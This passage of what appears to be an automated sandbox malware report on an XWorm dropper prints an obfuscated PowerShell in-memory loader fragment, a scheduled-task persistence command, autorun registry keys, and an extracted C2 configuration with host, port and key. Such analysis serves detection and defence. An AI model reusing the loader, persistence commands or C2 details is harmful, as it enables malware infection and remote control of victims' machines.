Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[
                        Sigma detected: Suspicious Program Location with Network Connections
                        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\DeadROOTkit.exe, Initiated: true, ProcessId: 4188, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49729
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Deadsvchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 6684, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deadsvchost
                        Sigma detected: Startup Folder File Write
                        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\Public\DeadXClient.exe, ProcessId: 6684, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 6684, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7000, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 6684, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7000, ProcessName: schtasks.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{ac6bab9f-cf5e-448a-be82-36c64370aff3}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 5644, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:PwejfaSCJJDP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vayDTkuWaaLxUU,[Parameter(Position=1)][Type]$fbfUvfPkbf)$SKuzEDmHWUw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+'e'+[Char](99)+''+[Char](116)+'ed'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'m'+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+'at'+'e'+'Ty'+[Char](112)+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+'l'+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$SKuzEDmHWUw.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$SKuzEDmHWUw.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'',$fbfUvfPkbf,$vayDTkuWaaLxUU).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $SKuzEDmHWUw.CreateType();}$mHgtxYLbOzoJe=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+'.W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'fe'+[Char](78)+''+'a'+''+'t'+'ive'+'M'+''+'e'+''+'t'+''+[Char](104)+''+'o'+'d'+'s'+'');$mfOCIRUxBUWIVl=$mHgtxYLbOzoJe.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+'c'+[Char](65)+'d'+[
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5644, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6288, ProcessName: svchost.exe

                        Persistence and Installation Behavior

                        barindex
                        Sigma detected: Schedule system process
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\Public\DeadXClient.exe" , ParentImage: C:\Users\Public\DeadXClient.exe, ParentProcessId: 6684, ParentProcessName: DeadXClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe", ProcessId: 7000, ProcessName: schtasks.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-22T19:38:22.499718+020028559241Malware Command and Control Activity Detected192.168.2.649997147.185.221.2128600TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: aoKTzGQSRP.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\Public\DeadROOTkit.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1.exeAvira: detection malicious, Label: TR/Dropper.Gen2
                        Source: C:\Users\Public\DeadCodeRootKit.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: C:\Users\Public\Deadsvchost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\Public\DeadXClient.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeAvira: detection malicious, Label: TR/Redcap.xbbft
                        Found malware configuration
                        Source: 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["updates-full.gl.at.ply.gg"], "Port": "60075", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.0"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\Public\DeadCodeRootKit.exeReversingLabs: Detection: 91%
                        Source: C:\Users\Public\DeadROOTkit.exeReversingLabs: Detection: 81%
                        Source: C:\Users\Public\DeadXClient.exeReversingLabs: Detection: 86%
                        Source: C:\Users\Public\Deadsvchost.exeReversingLabs: Detection: 86%
                        Source: C:\Users\user\AppData\Local\Temp\1.exeReversingLabs: Detection: 73%
                        Source: C:\Users\user\AppData\Local\Temp\CMaker 2.0.exeReversingLabs: Detection: 34%
                        Multi AV Scanner detection for submitted file
                        Source: aoKTzGQSRP.exeReversingLabs: Detection: 76%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\Public\DeadROOTkit.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1.exeJoe Sandbox ML: detected
                        Source: C:\Users\Public\DeadCodeRootKit.exeJoe Sandbox ML: detected
                        Source: C:\Users\Public\Deadsvchost.exeJoe Sandbox ML: detected
                        Source: C:\Users\Public\DeadXClient.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: aoKTzGQSRP.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: updates-full.gl.at.ply.gg
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: 60075
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: <123456789>
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: <Xwormmm>
                        Source: 7.0.DeadROOTkit.exe.dd0000.0.unpackString decryptor: USB.exe
                        Source: C:\Users\Public\DeadCodeRootKit.exeCode function: 8_2_00151000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,8_2_00151000
                        Source: aoKTzGQSRP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: CMaker 2.0.exe, 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2261490839.00007FFD8F632000.00000040.00000001.01000000.00000011.sdmp
                        Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: CMaker 2.0.exe, 00000002.00000003.2153120830.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2269341055.00007FFDA4341000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: CMaker 2.0.exe, 00000005.00000002.2262592946.00007FFD8FB3B000.00000040.00000001.01000000.00000009.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: CMaker 2.0.exe, 00000005.00000002.2270072340.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: CMaker 2.0.exe, 00000005.00000002.2267528583.00007FFDA32F1000.00000040.00000001.01000000.0000000C.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: CMaker 2.0.exe, 00000005.00000002.2268863981.00007FFDA3AE1000.00000040.00000001.01000000.00000013.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: CMaker 2.0.exe, 00000005.00000002.2269787988.00007FFDA4DA1000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: CMaker 2.0.exe, 00000005.00000002.2265214046.00007FFD9DFAC000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: CMaker 2.0.exe, 00000005.00000002.2268396288.00007FFDA3A81000.00000040.00000001.01000000.00000018.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001D.00000002.3467140160.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389517900.000002259582B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: CMaker 2.0.exe, 00000005.00000002.2269100050.00007FFDA4161000.00000040.00000001.01000000.0000000E.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001D.00000002.3467944393.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.2389562882.0000022595840000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2253563049.0000022D32BE0000.00000002.00000001.01000000.0000000B.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001D.00000000.2389682181.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3468658414.000002259585D000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: CMaker 2.0.exe, CMaker 2.0.exe, 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                        Source: C:\Users\Public\DeadCodeRootKit.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
